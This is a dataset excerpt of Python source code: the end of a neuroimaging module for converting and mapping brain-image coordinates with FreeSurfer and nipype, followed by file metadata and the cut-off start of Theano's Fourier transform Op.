from nipype.interfaces.freesurfer import MRIConvert,Label2Label
import warnings
from mne.label import grow_labels
from .freesurfer_files import Surf, FreesurferSurf, Annot
from .image_manipulation import img2img_register, mri_label2vol, img2img_coord_register
from scipy.spatial.distance import cdist
import pandas as pd
import shutil
from nibabel.freesurfer import read_label
from mne import Label
from collections import defaultdict
#############################################################################################################################
# Coords class
#############################################################################################################################
class Coords(object):
def __init__(self,coords, img_file, subject=None, coord_type='ras', working_dir=None, **traits):
""" General class to work with coordinates
Parameters
-----------
coords: numpy array
x,y,z coordinates matrix (npoints x 3)
img_file: str
path to image file
subject: str
subject name
coord_type: str, {'ras', 'voxel'}
coordinate system
working_dir:
the path to working directory
**traits: other traits of the coordinates;
the traits size should be equal to the number of npoints
for instance, one can add "name" or "color" as extra traits for each coordinate
Returns
--------
An object of Coords class
"""
coords = np.atleast_2d(coords)
self.img_file = img_file
self.subject=subject
self.coord_type = coord_type
self.img = nib.load(img_file)
self.working_dir = working_dir
self.vox2ras = self.img.affine
self.ras2vox = np.linalg.inv(self.vox2ras)
self.npoints = coords.shape[0]
self.coordinates = {}
affineM= self._to_affine_matrix(coords)
self._count=0
if coord_type=='ras':
self.coordinates['ras_coord'] = coords
self.coordinates['voxel_coord'] = np.round(np.dot(self.ras2vox,affineM).T[:,:3])
elif coord_type=='voxel':
self.coordinates['voxel_coord'] = coords
self.coordinates['ras_coord'] = np.dot(self.vox2ras,affineM).T[:,:3]
else:
raise ValueError('type should be either "ras" or "voxel"')
### to freesurfer coords
rnum1 = np.random.randint(10**15,10**16)
rnum2 = np.random.randint(10**10,10**11)
rnum = '{rnum1}_{rnum2}'.format(rnum1=rnum1,rnum2=rnum2)
os.makedirs(os.path.join(os.path.abspath('.'),'temp_{rnum}'.format(rnum=rnum)))
wf_dir = os.path.join(os.path.abspath('.'),'temp_{rnum}'.format(rnum=rnum))
## creating rawavg.mgz
mc = MRIConvert()
mc.inputs.in_file = img_file
mc.inputs.out_file = os.path.join(wf_dir,'rawavg.mgz')
mc.inputs.out_type = 'mgz'
mc.run()
## creating orig.mgz
mc = MRIConvert()
mc.inputs.in_file = os.path.join(wf_dir,'rawavg.mgz')
mc.inputs.out_file = os.path.join(wf_dir,'orig.mgz')
mc.inputs.out_type = 'mgz'
mc.inputs.conform = True
mc.run()
rawavg_file = os.path.join(wf_dir,'rawavg.mgz')
orig_file = os.path.join(wf_dir,'orig.mgz')
### loading
orig_img = nib.freesurfer.load(orig_file)
self.ras2fsvox = orig_img.header.get_ras2vox()
self.fsvox2ras_tkr = orig_img.header.get_vox2ras_tkr()
self.ras2ras_tkr = np.dot(self.fsvox2ras_tkr,self.ras2fsvox)
ras_affineM = self._to_affine_matrix(self.coordinates['ras_coord'])
self.coordinates['ras_tkr_coord'] = np.dot(self.fsvox2ras_tkr,np.dot(self.ras2fsvox, ras_affineM)).T[:,:3]
self.coordinates['fsvoxel_coord'] = np.round(np.dot(self.ras2fsvox,ras_affineM).T[:,:3])
shutil.rmtree(wf_dir)
##3 adding traits
self.traits_list = []
for trait in traits:
self.add_trait(trait,traits[trait])
def _to_affine_matrix(self,coords):
"""
returns an affine matrix for the specified coordinates
"""
return np.hstack((coords, np.ones((coords.shape[0],1)))).T
def add_trait(self,trait,value):
"""
Adds trait to the object
Parameters:
------------
trait: str
name of trait such as "name" or "color" or "opacity" or "network" etc.
value: list or array
a list or array of values for the trait
Examples:
-----------
coords = Coords(np.array([23,42,12],[12,45,12]),
img_file = anat_img)
coords.add_trait('name',['ldlpfc','lipl'])
coords.add_trait('color',[(0,1,0),(1,0,0)])
print('coordinates names: ', coords.name)
print('coordinates colors: ', coords.color)
"""
if type(value)!=np.ndarray:
try:
value = np.atleast_1d(value)
except:
ValueError('{trait} should be numpy.ndarray!'.format(trait=trait))
if value.shape[0]!=self.npoints:
raise ValueError('{trait} shape should be equal to number of points'.format(trait=trait))
self.__setattr__(trait,value)
if trait not in self.traits_list:
self.traits_list.append(trait)
def get_traits_dict(self):
"""
return a dictionary of all the traits for the coordinates
"""
traits={}
for trait in self.traits_list:
traits[trait] = self.__getattribute__(trait)
return traits
def get_coords_df(self, coord_types='all', subset_by=None, subset_vals=None):
"""
returns a dataframe for the different coordinates of the points ( ras coords, voxel_coords,.. )
"""
if coord_types=='all':
coord_types = self.coordinates.keys()
if subset_by:
targets = self.subset(subset_by,subset_vals)
else:
targets = self
results = []
for coord_type in coord_types:
coords = targets.coordinates[coord_type]
if hasattr(self,'name'):
coords_df = pd.DataFrame(coords,index=targets.name,columns=[coord_type+'_{axis}'.format(axis=a) for a in ['X','Y','Z']])
else:
coords_df = pd.DataFrame(coords,index=['coordinate_{i}'.format(i=i) for i in np.arange(self.npoints)], columns=[coord_type+'_{axis}'.format(axis=a) for a in ['X','Y','Z']])
results.append(coords_df)
return pd.concat(results,axis=1)
def map_to_surface(self, surface):
"""
maps the points to a surface
Parameters:
-----------
surface: either {'pial','white'} or an instance of Surf
Returns:
----------
A dictionary with the following keys:
vertices: the vertices numbers
ras_coord: the mapped ras coordinates
ras_tkr_coord: the mapped ras tkr coordinates
"""
if not isinstance(surface,Surf):
raise ("surface should be an instance of Surf")
coords_ras_tkr = self.coordinates['ras_tkr_coord']
indices = np.argmin(cdist(surface.vertices, coords_ras_tkr), axis=0)
mapped_coords_ras_tkr = surface.vertices[indices,:]
mapped_coords_ras_tkr_affineM = np.hstack((mapped_coords_ras_tkr,np.ones((mapped_coords_ras_tkr.shape[0],1))))
mapped_coords_ras = np.dot(np.linalg.inv(self.ras2ras_tkr),mapped_coords_ras_tkr_affineM.T).T
mapped_coords_ras = mapped_coords_ras[:,0:3]
results = {'vertices': indices, 'ras_coord': mapped_coords_ras, 'ras_tkr_coord':mapped_coords_ras_tkr}
return results
def img2imgcoord(self, ref_img, ref_name=None, method='linear', input_reorient2std=False, ref_reorient2std=False, wf_base_dir=None, wf_name='register',
linear_reg_file=None, warp_field_file = None, return_as_array=False):
"""
registers the coordinates to another volume.
Parameters:
-----------
ref_img:
path to reference image
ref_name: str
reference subject name
method: str, {'linear', 'nonlinear'}
FSL registration method (FLIRT for 'linear' or FNIRT for 'nonlinear')
input_reorient2std: boolean
reorient moving volume (img_file) to standard space using fslreorient2std
ref_reorient2std: boolean
reorient the reference image to standard orientation using fslreorient2std
wf_base_dir: str
the base directory where the results will be stored; if not specified, it will look for working_dir of Coords class;
if not found, it will use the currect directory as the base directory
wf_name: str
name of the working process; the results will be saved under <wf_base_dir>/<wf_name>
linear_reg_file: str
registeration file if exists
warp_field_file: str
nonlinear warp field if exits
10. return_as_array: boolean
if True, returns the new coordinates in a numpy ndarray;
otherwise, it will return an instance of Coords using ref_img as the image volume
"""
### wf_base_dir
if wf_base_dir is None and self.working_dir is not None:
wf_base_dir = self.working_dir
elif wf_base_dir is None and self.working_dir is None:
print('Working dir has not been specified, results will be stored in: ', os.path.abspath('.'))
wf_base_dir = os.path.abspath('.')
img_file = self.img_file
ras_coords = self.coordinates['ras_coord']
new_coords = img2img_coord_register(ras_coords, img_file, ref_img, wf_base_dir, method=method, input_reorient2std=input_reorient2std, ref_reorient2std=ref_reorient2std,
wf_name=wf_name,linear_reg_file=linear_reg_file, warp_field_file = warp_field_file)
if return_as_array is False:
traits={}
for trait in self.traits_list:
traits[trait] = self.__getattribute__(trait)
new_coords = Coords(coords=new_coords, img_file=ref_img, subject=ref_name,**traits)
return new_coords
def subset(self,by,vals):
"""
subsets the coordinates
Parameters:
-----------
by: str
which trait to use for subseting the coordinates; for instance you can use "name" to subset the coordinates
vals: list
what values to use; for instance you can provide a list of the names
Returns:
---------
An object of class Coords with all the traits from the original coords instance
Examples:
---------
coords = Coords(np.array([1,2,3],[3,4,5],[6,7,8]),img_file='anat.nii.gz',name=['c1','c2','c3'],network=['network1','network2','network1'])
coords_sub = coords.subset('network',['network1'])
"""
idx = []
for val in vals:
x = np.where(self.__getattribute__(by)==val)[0].tolist()
idx.extend(x)
idx = np.array(idx)
coords = self.coordinates['ras_coord'][idx,:]
traits={}
for trait in self.traits_list:
traits[trait] = self.__getattribute__(trait)[idx]
return Coords(coords, self.img_file , coord_type='ras', working_dir=self.working_dir, **traits)
def __iter__(self):
return self
def __next__(self):
if self._count>=self.npoints:
self._count = 0
raise StopIteration
else:
kwargs = {}
for trait in self.traits_list:
if hasattr(self,trait):
kwargs[trait] = self.__getattribute__(trait)[self._count]
ras_coord = self.coordinates['ras_coord'][self._count,:]
voxel_coord = self.coordinates['voxel_coord'][self._count,:]
c = _Coord(ras_coord,voxel_coord,**kwargs)
self._count+=1
return c
def __getitem__(self,idx):
kwargs = {}
for trait in self.traits_list:
if hasattr(self,trait):
kwargs[trait] = self.__getattribute__(trait)[self._count]
ras_coord = self.coordinates['ras_coord'][idx,:]
voxel_coord = self.coordinates['voxel_coord'][idx,:]
c = _Coord(ras_coord,voxel_coord,**kwargs)
return c
class _Coord(object):
def __init__(self, ras_coord, voxel_coord, **kwargs):
self.ras_coord = ras_coord
self.voxel_coord = voxel_coord
self.traits_list = []
for trait,value in kwargs.items():
self.__setattr__(trait,value)
self.traits_list.append(trait)
#############################################################################################################################
# MNICoords class
#############################################################################################################################
class MNICoords(Coords):
def __init__(self,coords, mni_template='MNI152_T1_2mm.nii.gz',mni_directory=os.environ['FSLDIR']):
mni_file = os.path.join(mni_directory,mni_tmeplate)
Coords.__init__(self,coords,mni_file)
#############################################################################################################################
# FreesurferCoords class
#############################################################################################################################
class FreesurferCoords(Coords):
def __init__(self, coords, subject, freesurfer_dir, guess_hemi=True, working_dir=None, coord_type='ras', **traits):
"""
Coords class when the freesurfer recon-all exists.
Parameters:
----------
coords: numpy array
x,y,z coordinates (npoints x 3)
subject: str
subject name
freesurfer_dir: str
Freesurfer SUBJECTS_DIR
guess_hemi: boolean
for each coordinate, guesses hemisphere
working_dir : str
the directory where the results will be written to.
**traits:
other traits for each coordinate such as "color" or "name"; look at the Coords class
"""
self.freesurfer_dir = freesurfer_dir
self.subject = subject
self.working_dir = working_dir
coords = np.atleast_2d(coords)
self.coord_type = coord_type
## setting image file names
rawavg_file = '{freesurfer_dir}/{subject}/mri/rawavg.mgz'.format(freesurfer_dir=freesurfer_dir,subject=subject)
orig_file = '{freesurfer_dir}/{subject}/mri/orig.mgz'.format(freesurfer_dir=freesurfer_dir,subject=subject)
self.img_file = rawavg_file
###
self.img = nib.load(self.img_file)
self.orig_img = nib.freesurfer.load(orig_file)
## transformations
self.vox2ras = self.img.affine
self.ras2vox = np.linalg.inv(self.vox2ras)
self.ras2fsvox = self.orig_img.header.get_ras2vox()
self.fsvox2ras_tkr = self.orig_img.header.get_vox2ras_tkr()
self.ras2ras_tkr = np.dot(self.fsvox2ras_tkr,self.ras2fsvox)
## populating coordinates
self.npoints = coords.shape[0]
self.coordinates = {}
self._count=0
affineM = self._to_affine_matrix(coords)
if coord_type=='ras':
self.coordinates['ras_coord'] = coords
self.coordinates['voxel_coord'] = np.round(np.dot(self.ras2vox,affineM).T[:,:3])
elif coord_type=='voxel':
self.coordinates['voxel_coord'] = coords
self.coordinates['ras_coord'] = np.dot(self.vox2ras,affineM).T[:,:3]
else:
raise ValueError('type should be either "ras" or "voxel"')
ras_affineM = self._to_affine_matrix(self.coordinates['ras_coord'])
self.coordinates['ras_tkr_coord'] = np.dot(self.fsvox2ras_tkr,np.dot(self.ras2fsvox, ras_affineM)).T[:,:3]
self.coordinates['fsvoxel_coord'] = np.round(np.dot(self.ras2fsvox,ras_affineM).T[:,:3])
self.coordinates['talairach_coord'] = self._get_talairach_coords()
## guessing hemisphere
if guess_hemi:
self._guess_hemi()
## adding traits
self.traits_list = []
for trait in traits:
self.add_trait(trait,traits[trait])
def _guess_hemi(self):
"""
uses Freesurfer voxel coordinate to guess hemisphere.
"""
self.hemi = []
self.hemi_not_determined = []
for s in np.arange(self.npoints):
if self.coordinates['fsvoxel_coord'][s,0]> 128:
self.hemi.append('lh')
elif self.coordinates['fsvoxel_coord'][s,0] < 128:
self.hemi.append('rh')
else:
w = """Could not determine hemiphere for point {x},{y},{z}. Right hemiphere has been chosen arbitrarily for this point.
Manually set the hemiphere for this point by calling set_hemi_manually!"""
w = w.format(x=self.coordinates['ras_coord'][s,0], y=self.coordinates['ras_coord'][s,1], z=self.coordinates['ras_coord'][s,2])
warnings.warn(w)
self.hemi_not_determined.append(s)
self.hemi.append('rh')
self.hemi = np.array(self.hemi)
def set_hemi_manually(self, n, hemi):
"""
sets hemisphere manually for point n
"""
self.hemi[n] = hemi
if n in self.hemi_not_determined:
self.hemi_not_determined.remove(n)
def _read_talaraich_transformation(self):
""" read talairach transformation from freesurfer talairach.xfm output"""
fname = '{freesurfer_dir}/{subject}/mri/transforms/talairach.xfm'.format(freesurfer_dir=self.freesurfer_dir,
subject=self.subject)
f = open(fname,'r').read().split('\n')
### cleaning rows of file
def clean_number(x):
if ';' in x:
return float(x[0:-1])
else:
return float(x)
rows = []
for i in [5,6,7]:
row = f[i].split(' ')
row = [clean_number(x) for x in row]
rows.append(row)
return np.array(rows)
def _get_talairach_coords(self):
""" transforms the coordinates by talairach transform matrix from freesurfer talairach.xfm"""
talairach_tr = self._read_talaraich_transformation()
return np.dot(talairach_tr,self._to_affine_matrix(self.coordinates['ras_coord'])).T[:,:3]
def map_to_annot(self, annot, map_surface='white', inplace=True):
""" map each point to specified annotation
Parameters:
-----------
annot: str
which annotation to use
map_surface: str, {'pial','white'}
the surface that points are projected into to get the vertices
Returns:
---------
structures: numpy array
a numpy array of structures ( annotations)
color: numpy array
a numpy array (npoints x 3) that specifies the color based on the annotation provided
"""
if len(self.hemi_not_determined)>0:
raise ValueError('Use set_hemi_manually to assign hemiphere to these points: %s'%(','.join(self.hemi_not_determined)))
lh_annot = Annot('lh', annot, self.subject, self.freesurfer_dir)
rh_annot = Annot('rh', annot, self.subject, self.freesurfer_dir)
colors = np.zeros((self.npoints,3))
structures = np.empty(self.npoints,dtype='object')
mapped_vertices_indices = self.map_to_surface(surface=map_surface)['vertices']
lh_mapped_vertices_indices = mapped_vertices_indices[self.hemi=='lh']
rh_mapped_vertices_indices = mapped_vertices_indices[self.hemi=='rh']
if np.sum(self.hemi=='lh')>0:
lh_colors, lh_structures = lh_annot.get_vertices_colors(lh_mapped_vertices_indices),lh_annot.get_vertices_names(lh_mapped_vertices_indices)
colors[self.hemi=='lh',:] = lh_colors
structures[self.hemi=='lh'] = ['lh_' + x.decode('UTF-8') for x in lh_structures]
if np.sum(self.hemi=='rh')>0:
rh_colors, rh_structures = rh_annot.get_vertices_colors(rh_mapped_vertices_indices),rh_annot.get_vertices_names(rh_mapped_vertices_indices)
colors[self.hemi=='rh',:] = rh_colors
structures[self.hemi=='rh'] = ['rh_' + x.decode('UTF-8') for x in rh_structures]
if inplace:
self.add_trait('color',colors)
self.add_trait('name', structures)
return structures, colors
def map_to_surface(self, surface='white'):
"""
maps the points to a surface ( either pial or white) or an instance of Surf class.
"""
if len(self.hemi_not_determined)>0:
raise ValueError('Use set_hemi_manually to assign hemiphere to these points: %s'%(','.join(self.hemi_not_determined)))
lh_coords_ras_tkr = self.coordinates['ras_tkr_coord'][self.hemi=='lh',:]
rh_coords_ras_tkr = self.coordinates['ras_tkr_coord'][self.hemi=='rh',:]
if surface in ['white','pial']:
lh_surf = FreesurferSurf('lh', surface,self.subject, self.freesurfer_dir)
rh_surf = FreesurferSurf('rh', surface, self.subject, self.freesurfer_dir)
lh_indices = np.argmin(cdist(lh_surf.vertices, lh_coords_ras_tkr), axis=0)
rh_indices = np.argmin(cdist(rh_surf.vertices, rh_coords_ras_tkr), axis=0)
lh_mapped_coords_ras_tkr= lh_surf.vertices[lh_indices,:]
rh_mapped_coords_ras_tkr= rh_surf.vertices[rh_indices,:]
elif isinstance(surface,Surf):
lh_indices = np.argmin(cdist(surface.vertices, lh_coords_ras_tkr), axis=0)
rh_indices = np.argmin(cdist(surface.vertices, rh_coords_ras_tkr), axis=0)
lh_mapped_coords_ras_tkr = surface.vertices[lh_indices,:]
rh_mapped_coords_ras_tkr = surface.vertices[rh_indices,:]
mapped_vertices = np.empty(self.npoints, dtype='int')
mapped_vertices[self.hemi=='lh']= lh_indices
mapped_vertices[self.hemi=='rh'] = rh_indices
mapped_coords_ras_tkr = np.zeros((self.npoints,3))
mapped_coords_ras_tkr[self.hemi=='lh',:] = lh_mapped_coords_ras_tkr
mapped_coords_ras_tkr[self.hemi=='rh',:] = rh_mapped_coords_ras_tkr
mapped_coords_ras_tkr_affineM = np.hstack((mapped_coords_ras_tkr,np.ones((mapped_coords_ras_tkr.shape[0],1))))
mapped_coords_ras = np.dot(np.linalg.inv(self.ras2ras_tkr),mapped_coords_ras_tkr_affineM.T).T
mapped_coords_ras = mapped_coords_ras[:,0:3]
results = {'vertices': mapped_vertices, 'ras_coord': mapped_coords_ras, 'ras_tkr_coord':mapped_coords_ras_tkr}
return results
def create_surf_roi(self, extents, surface='white', map_surface='white', map_to_annot=None, wf_base_dir=None,
wf_name='surf_roi', add_vertex_to_name=True):
""" creates surface ROIs for each coordinate point
Parameters
----------
extents: float or numpy array
specifies the raidus of the growing ROI. Either one single number for all the points or a numpy array containing
radius for each point
surface: str
specifies which surface to use for growing the ROIs ( white or pial)
map_to_annot: str
specifies which annotation to use to assign name and color to use for ROI labeling
wf_base_dir: str
workflow base dir
wf_name: str
workflow name , the results will be saved under <wf_base_dir>/<wf_name>
add_vertex_to_name: boolean
if True, adds the projected vertex number to the ROI name ( in case the ROIs might have similar naming, adding vertex number can help get rid of this issue)
Returns
-------
rois: instances of class of Label
rois_paths: path to the saved labels
"""
## wf_base_dir
if wf_base_dir is None and self.working_dir is not None:
wf_base_dir = self.working_dir
elif wf_base_dir is None and self.working_dir is None:
print('Working dir has not been specified, results will be stored in: ', os.path.abspath('.'))
wf_base_dir = os.path.abspath('.')
if len(self.hemi_not_determined)>0:
raise ValueError('Use set_hemi_manually to assign hemiphere to these points: %s'%(','.join(self.hemi_not_determined)))
results = self.map_to_surface(map_surface)
mapped_vertices, mapped_coords_ras_tkr, mapped_coords_ras = results['vertices'], results['ras_coord'], results['ras_tkr_coord']
### extents can be one number or an array, make it an array if it is a number
if type(extents)==list or type(extents)==np.ndarray:
assert(len(extents)==self.npoints,'extents can be either one number or a list where len(extents) is equal to number of points')
else:
extents = [extents]*self.npoints
hemi = [0 if hemi=='lh' else 1 for hemi in self.hemi]
rois = grow_labels(self.subject, mapped_vertices, extents, hemi, self.freesurfer_dir, surface=surface)
### get structures and color for labels according to annotation
if map_to_annot:
structures, colors = self.map_to_annot(annot, map_surface=map_surface)
for i in range(self.npoints):
rois[i].color = colors[i]
vertex = mapped_vertices[i]
if add_vertex_to_name:
rois[i].name = structures[i]+'_{r}mm_{surf}_{vertex}'.format(r=extents[i],surf=surface,vertex=vertex)
else:
rois[i].name = structures[i]+'_{r}mm_{surf}'.format(r=extents[i],surf=surface)
elif hasattr(self,'name') or hasattr(self,'color'):
for i in range(self.npoints):
if hasattr(self,'name'):
vertex = mapped_vertices[i]
if add_vertex_to_name:
rois[i].name = self.name[i]+'_{r}mm_{surf}_{vertex}'.format(r=extents[i],surf=surface,vertex=vertex)
else:
rois[i].name = self.name[i]+'_{r}mm_{surf}'.format(r=extents[i],surf=surface,vertex=vertex)
if hasattr(self,'color'):
rois[i].color = self.color[i]
else:
for i in range(self.npoints):
vertex = mapped_vertices[i]
if add_vertex_to_name:
rois[i].name = 'coor_id_{i}_{r}mm_{surf}_{vertex}'.format(r=extents[i],surf=surface,vertex=vertex,i=i)
else:
rois[i].name = 'coor_id_{i}_{r}mm_{surf}_{vertex}'.format(r=extents[i],surf=surface,vertex=vertex,i=i)
#### saving ROI labels
rois_path = []
if not os.path.exists(os.path.join(wf_base_dir,wf_name)):
os.makedirs(os.path.join(wf_base_dir,wf_name))
for i,roi in enumerate(rois):
os.environ['SUBJECTS_DIR'] = self.freesurfer_dir
### saving ROI label
roi_path = '{wf_base_dir}/{wf_name}/{roi_name}-{hemi}.label'.format(wf_base_dir=wf_base_dir, wf_name=wf_name, roi_name=roi.name, hemi=roi.hemi)
rois_path.append(roi_path)
roi.save(roi_path)
### converting list to arrays
self.add_trait('roi', np.array(rois))
return self.roi,rois_path
def img2imgcoord(self, ref_img, ref_name=None, method='linear', input_reorient2std=True, ref_reorient2std=False, wf_base_dir = None, wf_name='register', linear_reg_file=None, warp_field_file = None, return_as_array=False):
## wf_base_dir
if wf_base_dir is None and self.working_dir is not None:
wf_base_dir = self.working_dir
elif wf_base_dir is None and self.working_dir is None:
print('Working dir has not been specified, results will be stored in: ', os.path.abspath('.'))
wf_base_dir = os.path.abspath('.')
## converting rawavg to nifti
mc = MRIConvert()
mc.inputs.in_file = self.img_file
mc.inputs.out_file = 'rawavg.nii.gz'
mc.inputs.out_type = 'niigz'
mc_node = pe.Node(mc,name='rawavg_to_nifti')
wf = pe.Workflow(name=wf_name,base_dir=wf_base_dir)
wf.add_nodes([mc_node])
wf.run()
ras_coords = self.coordinates['ras_coord']
new_coords = img2img_coord_register(ras_coords, os.path.join(wf_base_dir,wf_name,'rawavg_to_nifti','rawavg.nii.gz'), ref_img, wf_base_dir, method=method,
input_reorient2std=input_reorient2std, ref_reorient2std=ref_reorient2std,
wf_name=wf_name, linear_reg_file=linear_reg_file, warp_field_file = warp_field_file)
if return_as_array is False:
## traits
traits={}
for trait in self.traits_list:
traits[trait] = self.__getattribute__(trait)
new_coords = Coords(coords=new_coords, img_file=ref_img, subject=ref_name,**traits)
return new_coords
def img2imgcoord_by_surf(self, target_subject, wf_base_dir=None, source_surface = 'pial', source_map_surface='pial', target_surface='pial'):
if wf_base_dir is None and self.working_dir is not None:
wf_base_dir = self.working_dir
elif wf_base_dir is None and self.working_dir is None:
print('Working dir has not been specified, results will be stored in: ', os.path.abspath('.'))
wf_base_dir = os.path.abspath('.')
rois,rois_paths = self.create_surf_roi(extents=2, wf_base_dir= wf_base_dir, wf_name='img2imgcoord_by_surf_roi', surface=source_surface, map_surface=source_map_surface, label2vol=False)
wf = pe.Workflow(name='label2label',base_dir=wf_base_dir)
for i in range(self.npoints):
l2l = Label2Label()
l2l.inputs.hemisphere = self.hemi[i]
l2l.inputs.subject_id = target_subject
l2l.inputs.sphere_reg = os.path.join(self.freesurfer_dir, target_subject, 'surf', self.hemi[i]+'.'+'sphere.reg')
l2l.inputs.white = os.path.join(self.freesurfer_dir, target_subject, 'surf', self.hemi[i]+'.'+'white')
l2l.inputs.source_subject = self.subject
l2l.inputs.source_label = rois_paths[i]
l2l.inputs.source_white = os.path.join(self.freesurfer_dir, self.subject, 'surf', self.hemi[i]+'.'+'white')
l2l.inputs.source_sphere_reg = os.path.join(self.freesurfer_dir, self.subject, 'surf', self.hemi[i]+'.'+'sphere.reg')
l2l.subjects_dir = self.freesurfer_dir
l2l_node = pe.Node(l2l,'label2label_{i}'.format(i=i))
wf.add_nodes([l2l_node])
try:
wf.run()
except RuntimeError:
pass
for i in range(self.npoints):
out_label_file = os.path.join(self.freesurfer_dir, target_subject, 'label', os.path.basename(rois_paths[i]).split('.label')[0]+'_converted'+'.label')
shutil.move(out_label_file, os.path.join(wf_base_dir, 'label2label','label2label_{i}'.format(i=i)))
new_coords = np.zeros((self.npoints,3))
for i in range(self.npoints):
label_file = os.path.join(wf_base_dir, 'label2label','label2label_{i}'.format(i=i),os.path.basename(rois_paths[i]).split('.label')[0]+'_converted'+'.label')
label_vertices = read_label(label_file)
label_vertices.sort()
label = Label(label_vertices,hemi=self.hemi[i],subject=target_subject)
vertex = label.center_of_mass()
targ_surf = FreesurferSurf(hemi=label.hemi, surf=target_surface, subject = target_subject, subjects_dir=self.freesurfer_dir)
new_coords[i,:] = targ_surf.get_coords(vertex)
return new_coords
def __iter__(self):
return self
def __next__(self):
if self._count>=self.npoints:
self._count = 0
raise StopIteration
else:
kwargs = {}
for trait in self.traits_list:
if hasattr(self,trait):
kwargs[trait] = self.__getattribute__(trait)[self._count]
t = _FreesurferCoord(ras_coord = self.coordinates['ras_coord'][self._count,:],
voxel_coord = self.coordinates['voxel_coord'][self._count],
ras_tkr_coord = self.coordinates['ras_tkr_coord'][self._count,:],
fsvoxel_coord = self.coordinates['fsvoxel_coord'][self._count],
talairach_coord = self.coordinates['talairach_coord'][self._count],
hemi = self.hemi[self._count],
**kwargs)
self._count +=1
return t
def __getitem__(self,idx):
kwargs = {}
for trait in self.traits_list:
if hasattr(self,trait):
kwargs[trait] = self.__getattribute__(trait)[idx]
t = _FreesurferCoord(ras_coord = self.coordinates['ras_coord'][idx,:],
voxel_coord = self.coordinates['voxel_coord'][idx],
ras_tkr_coord = self.coordinates['ras_tkr_coord'][idx,:],
fsvoxel_coord = self.coordinates['fsvoxel_coord'][idx],
talairach_coord = self.coordinates['talairach_coord'][idx],
hemi = self.hemi[idx],
**kwargs)
return t
def subset(self,by,vals):
idx = []
for val in vals:
x = np.where(self.__getattribute__(by)==val)[0].tolist()
idx.extend(x)
idx = np.array(idx)
coords = self.coordinates['ras_coord'][idx,:]
traits={}
for trait in self.traits_list:
traits[trait] = self.__getattribute__(trait)[idx]
return FreesurferCoords(coords, self.subject, self.freesurfer_dir, guess_hemi=True, working_dir=self.working_dir, **traits)
class FsaverageCoords(FreesurferCoords):
def __init__(self, coords, subject='fsaverage', freesurfer_dir=os.environ['SUBJECTS_DIR'], guess_hemi=True, working_dir=None, **traits):
"""
This class implements methods to transform between coordinates in the Freesurfer space.
Parameters
==========
coords: numpy array (n x 3). Coords are RAS coords defined in the native T1 space (rawavg).
subject: Freesurfer subject ID
freesurfer_dir: Freesurfer freesurfer_dir
guess_hemi: uses Freesurfer processed volumes to guess which hemisphere each point belongs to.
**traits: dictionary containing other traits
"""
self.freesurfer_dir = freesurfer_dir
self.subject = subject
self.working_dir = working_dir
coords = np.atleast_2d(coords)
## setting image file names
orig_file = '{freesurfer_dir}/{subject}/mri/orig.mgz'.format(freesurfer_dir=freesurfer_dir,subject=subject)
## transformations
self.orig_img = nib.freesurfer.load(orig_file)
self.ras2fsvox = self.orig_img.header.get_ras2vox()
self.fsvox2ras_tkr = self.orig_img.header.get_vox2ras_tkr()
self.ras2ras_tkr = np.dot(self.fsvox2ras_tkr,self.ras2fsvox)
## populating coordinates
self.npoints = coords.shape[0]
self.coordinates = {}
self.coordinates['ras_coord'] = coords
self._count=0
affineM = self._to_affine_matrix(coords)
### initiating Coords class.
self.coordinates['ras_tkr_coord'] = np.dot(self.fsvox2ras_tkr,np.dot(self.ras2fsvox, affineM)).T[:,:3]
self.coordinates['fsvoxel_coord'] = np.round(np.dot(self.ras2fsvox,affineM).T[:,:3])
self.coordinates['talairach_coord'] = self.coordinates['ras_coord']
self.coordinates['voxel_coord'] = self.coordinates['fsvoxel_coord']
## guessing hemisphere
if guess_hemi:
self._guess_hemi()
## adding traits
self.traits_list = []
for trait in traits:
self.add_trait(trait,traits[trait])
class _FreesurferCoord(object):
def __init__(self,ras_coord, voxel_coord, ras_tkr_coord, fsvoxel_coord, talairach_coord, hemi, **kwargs):
self.ras_coord = ras_coord
self.voxel_coord = voxel_coord
self.ras_tkr_coord = ras_tkr_coord
self.fsvoxel_coord = fsvoxel_coord
self.talairach_coord = talairach_coord
self.hemi = hemi
self.traits_list = []
for trait,value in kwargs.items():
self.__setattr__(trait, value)
self.traits_list.append(trait)
def add_trait(self, trait, value):
self.__setattr__(trait,value)
if trait not in self.traits_list:
self.traits_list.append(trait)
| 39.348249 | 226 | 0.563906 |
7b4bd8538a76e2e4eea9b3a1b2908f033206b438 | 6,383 | py | Python | theano/tensor/fourier.py | mdda/Theano | 6ca7b2b65000e371f009b617d41bc5a90f022d38 | [
"BSD-3-Clause"
] | 295 | 2015-09-25T21:15:04.000Z | 2022-01-13T01:16:18.000Z | libs/Theano/theano/tensor/fourier.py | shenshenzhanzhan/attention-lvcsr | 598d487c118e66875fdd625baa84ed29d283b800 | [
"MIT"
] | 21 | 2015-10-28T19:06:32.000Z | 2022-03-11T23:13:05.000Z | libs/Theano/theano/tensor/fourier.py | shenshenzhanzhan/attention-lvcsr | 598d487c118e66875fdd625baa84ed29d283b800 | [
"MIT"
] | 114 | 2015-09-26T21:23:02.000Z | 2021-11-19T02:36:41.000Z | import numpy
import math
from theano import gof, tensor
class Fourier(gof.Op):
"""
An instance of this class returns a finite fourier transform calcutated
along one dimension of an input array.
inputs:
a : Array of at least one dimension. Can be complex.
n : Integer, optional. Length of the transformed axis of the output. If n
is smaller than the length of the input, the input is cropped. If it is
larger, the input is padded with zeros. If n is not given, the length of
the input (along the axis specified by axis) is used.
axis : Integer, optional. Axis over which to compute the FFT. If not
supplied, the last axis is used.
output:
Complex array. The input array, transformed along the axis
indicated by 'axis' or along the last axis if 'axis' is not specified. It
is truncated or zero-padded as required if 'n' is specified.
(From numpy.fft.fft's documentation:)
The values in the output follow so-called standard order. If A = fft(a, n),
then A[0] contains the zero-frequency term (the mean of the signal), which
is always purely real for real inputs. Then A[1:n/2] contains the
positive-frequency terms, and A[n/2+1:] contains the negative-frequency
terms, in order of decreasingly negative frequency. For an even number of
input points, A[n/2] represents both positive and negative Nyquist
frequency, and is also purely real for real input. For an odd number of
input points, A[(n-1)/2] contains the largest positive frequency, while
A[(n+1)/2] contains the largest negative frequency.
"""
__props__ = ()
def make_node(self, a, n, axis):
a = tensor.as_tensor_variable(a)
if a.ndim < 1:
raise TypeError('%s: input must be an array, not a scalar' %
self.__class__.__name__)
if axis is None:
axis = a.ndim - 1
axis = tensor.as_tensor_variable(axis)
else:
axis = tensor.as_tensor_variable(axis)
if (not axis.dtype.startswith('int')) and \
(not axis.dtype.startswith('uint')):
raise TypeError('%s: index of the transformed axis must be'
